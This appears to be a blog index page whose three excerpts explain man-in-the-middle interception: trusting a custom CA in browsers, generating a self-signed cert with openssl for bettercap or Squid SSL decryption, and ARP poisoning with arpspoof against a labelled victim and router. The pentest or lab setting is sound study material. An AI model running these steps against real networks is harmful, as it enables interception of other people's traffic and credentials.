Client Certificates for SSL Decryption

Here’s how to install the CA certificate on multiple platforms for MITM. For Linux you have to import certificates into individual browsers.  For Firefox, go to edit/preferences/advanced/certificates/view and import the cert under authorities. Check the box for “Identifies Websites.”  For Chrome, click settings, search for cert, and open ‘Manage Certificates.’  Read more…

SSL Decryption

Here’s how to generate custom certs and perform a MITM + SSL decryption with bettercap or Squid. MITM with Bettercap. Create a private key, CSR, and Certificate. openssl genrsa -out mitm.key 2048 openssl req -new -key mitm.key -out mitm.csr openssl x509 -req -days 3652 -in mitm.csr -signkey mitm.key -out mitm.crt Read more…

MITM Reference

Attacker: 172.16.1.10 Victim: 172.16.1.20 Router: 172.16.1.1 Arpspoof method: First enable forwarding on the attacking system. echo ‘1’ > /proc/sys/net/ipv4/ip_forward Poison the ARP table of the router to tell it that you are the victim. arpspoof -i eth0 172.16.1.20 172.16.1.1 Poison the ARP table of the victim to tell it that Read more…